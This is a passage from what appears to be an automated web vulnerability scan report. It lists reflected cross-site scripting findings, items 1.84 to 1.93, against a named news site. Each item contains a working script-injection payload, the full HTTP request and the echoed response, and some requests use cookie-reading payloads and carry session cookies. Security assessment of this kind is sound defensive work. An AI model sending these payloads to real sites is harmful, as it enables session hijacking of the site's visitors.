Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95\"><script>alert(1)</script>ba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.84. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1307"><script>alert(1)</script>97e10d51e52 was submitted in the REST URL parameter 2. This input was echoed as f1307\"><script>alert(1)</script>97e10d51e52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011f1307"><script>alert(1)</script>97e10d51e52/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:02:22 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=21377961c5fe6ca527ac4b7a3f5c7ae3; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:02:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011f1307\"><script>alert(1)</script>97e10d51e52/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.85. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cdd"><script>alert(1)</script>cc94d955a23 was submitted in the REST URL parameter 3. This input was echoed as 89cdd\"><script>alert(1)</script>cc94d955a23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/0189cdd"><script>alert(1)</script>cc94d955a23/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:04:33 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=990e20ffb5e6047b90ac8ea04654f25a; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:04:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/0189cdd\"><script>alert(1)</script>cc94d955a23/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.86. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73ff"><script>alert(1)</script>8db99260b37 was submitted in the REST URL parameter 4. This input was echoed as f73ff\"><script>alert(1)</script>8db99260b37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25f73ff"><script>alert(1)</script>8db99260b37/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:04:39 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=94e3c93da979f5c6aaa6b1b37e48d845; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:04:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25f73ff\"><script>alert(1)</script>8db99260b37/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.87. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a32"><script>alert(1)</script>70e86cd3338 was submitted in the REST URL parameter 5. This input was echoed as 32a32\"><script>alert(1)</script>70e86cd3338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman32a32"><script>alert(1)</script>70e86cd3338/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:04:45 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=3123b41cae1efa35d010678b001ca2fb; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:04:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman32a32\"><script>alert(1)</script>70e86cd3338/x26amp" />
...[SNIP]...

1.88. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20215"><script>alert(1)</script>3f11104f034 was submitted in the REST URL parameter 6. This input was echoed as 20215\"><script>alert(1)</script>3f11104f034 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp20215"><script>alert(1)</script>3f11104f034;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:05:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=0ef8276f563ac145ff17e6a808d7e416; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:05:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp20215\"><script>alert(1)</script>3f11104f034;rct\\\\x3dj\\\\x26amp;sa\\\\x3dX\\\\x26amp;ei\\\\x3dteNGTZzQLsb_lged9pk8\\\\x26amp;ved\\\\x3d0CHQQpwIwCQ\\\\x26amp;q\\\\x3dcross+site+scripting\\\\x26amp;usg\\\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\
...[SNIP]...

1.89. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a233"><script>alert(1)</script>c66f355344f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a233\"><script>alert(1)</script>c66f355344f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp?4a233"><script>alert(1)</script>c66f355344f=1 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:00:56 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=2f30351892d2c2142b9d3a85c352577e; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:00:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp?4a233\"><script>alert(1)</script>c66f355344f=1" />
...[SNIP]...

1.90. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f748"><script>alert(1)</script>6e9663119ac was submitted in the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 parameter. This input was echoed as 9f748\"><script>alert(1)</script>6e9663119ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x229f748"><script>alert(1)</script>6e9663119ac HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:01:33 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=59abd215b5d8ee4c4ab4ca9b598dc7b9; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:01:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
\\\x3dj\\\\x26amp;sa\\\\x3dX\\\\x26amp;ei\\\\x3dteNGTZzQLsb_lged9pk8\\\\x26amp;ved\\\\x3d0CHQQpwIwCQ\\\\x26amp;q\\\\x3dcross+site+scripting\\\\x26amp;usg\\\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\\\x229f748\"><script>alert(1)</script>6e9663119ac" />
...[SNIP]...

1.91. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8188"><script>alert(1)</script>e9ff90f9af1 was submitted in the REST URL parameter 10. This input was echoed as a8188\"><script>alert(1)</script>e9ff90f9af1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.coma8188"><script>alert(1)</script>e9ff90f9af1/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:09:11 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:09:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
script%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.coma8188\"><script>alert(1)</script>e9ff90f9af1/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%
...[SNIP]...

1.92. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 11 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d576"><script>alert(1)</script>803d0c7c394 was submitted in the REST URL parameter 11. This input was echoed as 2d576\"><script>alert(1)</script>803d0c7c394 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files2d576"><script>alert(1)</script>803d0c7c394/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:10:23 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:10:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files2d576\"><script>alert(1)</script>803d0c7c394/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E
...[SNIP]...

1.93. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 12 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b157"><script>alert(1)</script>b60a879cda8 was submitted in the REST URL parameter 12. This input was echoed as 2b157\"><script>alert(1)</script>b60a879cda8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

